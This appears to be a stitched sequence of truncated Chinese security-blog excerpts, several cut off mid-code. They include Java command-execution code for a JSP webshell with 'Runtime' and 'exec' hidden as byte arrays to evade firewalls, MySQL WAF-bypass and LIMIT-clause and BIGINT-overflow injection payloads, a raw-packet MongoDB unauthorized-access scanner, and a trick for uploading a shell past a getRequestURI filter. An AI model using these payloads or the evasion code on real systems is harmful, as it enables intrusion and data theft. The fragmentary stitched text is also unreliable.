这个Java代码审计系列是年前公司内部最后一次技术分享，开源到了Github(包含了代码和文章)也在凌天实验室公众号发布过，因为时间不够并未写完，年后若有时间会将剩下的部分完成。 Git地址: javaweb-codereview 文章地址: JavaSecureCodeReview

看了 @动后河 jsp上传cmd马却遇到防火墙的绕过方法，很久以前和 @xcoder 师傅搞过类似的东东。贴出我的执行CMD利用代码： import java.io.InputStream; import java.lang.reflect.Method; import java.util.Scanner; public class ReflectTest { public static String reflect(String str) throws Exception { String runtime = new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }); Class<?> c = Class.forName(runtime); Method m1 = c.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })); Method m2 = c.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class

app_ip_lookup.sql这个直接是SQL文件数据量400W+。IP段来自https://db-ip.com/db/ IP经纬度数据来自http://dev.maxmind.com/geoip/legacy/geolite/ 国内数据来自http://ip.taobao.com/ IP数据变动太快，有点差异很正常。db-ip的IP段好像只划到了0-223.29.206.255 漏了些国内的。 IP地址是long，可以用select INET_NTOA(ip_start_int),INET_NTOA(ip_end_int) from app_ip_lookup 自己转。 下载地址：app_ip_lookup.sql.zip 域名库： 这个是我上次发的那个1.9亿域名A记录(主域名:1.18亿，子域名7300万)的所有主域名主域名解析记录，数据格式是JSON。我重新解析了下所有的主域名，成功的有7000W+失败差不多4000W。当然失败的原因可能有的域名已过期删除了也可能是犹豫网络原因或者只解析了www通过xxx.com无法解析的情况。 格式：ip地址，主机名，计算机名，域名,解析失败的会过些天再解析一次。 下载地址：dns.zip 子域名TOP3000最近更新了下，删除了大量可能是垃圾的域名。具体的排名如下： 子域名前缀top3000.txt

@盛大网络 elasticsearch又出新版本了，这次修复了一个任意文件读取漏洞（写的是目录遍历）。 官方的release notes: 在这里看描述:https://github.com/elastic/elasticsearch/pull/10815 在这里看漏洞详情：https://github.com/spinscale/elasticsearch/commit/5d8e9e24c917b5f2c0958ba68be34a42efaeadbc 原来代码是： if (!Files.exists(file) || Files.isHidden(file)) { 修改后加了验证 if (!Files.exists(file) || Files.isHidden(file) || !file.toAbsolutePath().normalize().startsWith(siteFile.toAbsolutePath())) { @Test /** + * Test normalizing of path + */ + @Test + public void testThatPathsAreNormalized() throws Exception { + // more info: https://www.owasp.org/

转:mysql syntax bypass some WAF 一个小tips，twitter上看见的： 一句话： select{x table_name}from{x information_schema.tables} 测试: mysql> select{x table_name}from{x information_schema.tables}; +----------------------------------------------------+ | table_name | +----------------------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES

FROM：http://zone.wooyun.org/content/18220 from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ 此方法适用于MySQL 5.x中，在limit语句后面的注入 例如： SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY，MySQL当中UNION语句不能在ORDER BY的后面，否则利用UNION很容易就可以读取数据了，看看在MySQL 5中的SELECT语法： SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_c

Mongodb默认不需要配置auth导致未授权访问问题令人堪忧。 前年的时候写了个Mongodb未授权扫描工具发现了一些企业Mongodb未授权访问问题(测试发现包括一些游戏厂商)，但在数量上还不太严重。 近期Mongodb问题越演越烈，上周对10812个国内IP进行探测时候发现了接近4000个未授权访问IP。 漏洞验证方法： 利用mongo-java-driver-2.12.4.jar MongoClient client = new MongoClient(host,port); 或: private boolean loginTest(String host,int timeout){ try { byte[] b = new byte[]{0x3f,0x00,0x00,0x00,(byte) 0x97,0x75,(byte) 0xbc,0x60,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xd4,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x61,0x64,0x6d,0x69,0x6e,0x2e,0x24,0x63,0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x00,0x00,0

0x00 简介 BurpSuite神器这些年非常的受大家欢迎，在国庆期间解了下Burp相关开发并写了这篇笔记。希望和大家分享一下JavaSwing和Burp插件相关开发。第一节仅简单的了解下API相关，后面会带着大家利用Netbeans开发我们自己的扩展以及各种有趣的小工具。 0x01 怎么学？ 第一个问题是我们应该怎么去写自己的Burp扩展？我们可以找一些现有的扩展学习下，或者参阅官方文档或者手册，其次才是google一下是否有相关的教程、文章进行学习。 google搜索：burp suite api，找到官方的API相关说明。 http://portswigger.net/burp/extender/ http://blog.portswigger.net/2012/12/draft-new-extensibility-api.html You can: 执行和修改 HTTP 请求和响应 访问运行时的数据，比如：代理日志、目标站map和扫描问题 启动自己的action，如扫描和网站爬行 自定义扫描检测和注册扫描问题 提供自定义Intruder payloads和payload处理 查询和更新Suite-wide的目标作用域 查询和更新session处理cookie jar 实现自定义session处理action 添加自定义的标签(tabs)和上下文菜单项到Burp 用户界面

from：https://rdot.org/forum/showthread.php?t=3167、http://sb.f4ck.org/thread-19159-1-1.html 原文是俄文，不好做翻译，附上大概的内容： 这种报错注入主要基于Mysql数据类型溢出 mysql > SELECT 18446744073709551610 * 2 ; ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)' mysql > SELECT - 1 * 9223372036854775808 ; ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)' 查询数据库版本： mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610, 18446744073709551610)); ERROR 1690 (22003): BIGINT U

一般人喜欢用： request.getRequestURI(); 然后再判断这个URI是否合法，其实这个写法存在弊端。很简单当请求/upload/index.jsp，由于默认的web.xml默认一般指定了index.jsp为索引文件。所以访问/upload/一样可以访问到这个jsp。只有可以绕过通过Filter拦截upload目录下的所有.jsp访问。上传shell的时候可以试试把文件名改成：index.jsp 正确的写法应该是： request.getServletPath() getServletPath()获取到的路径会是一个完整的Servlet路径，所以自然就无法绕过了。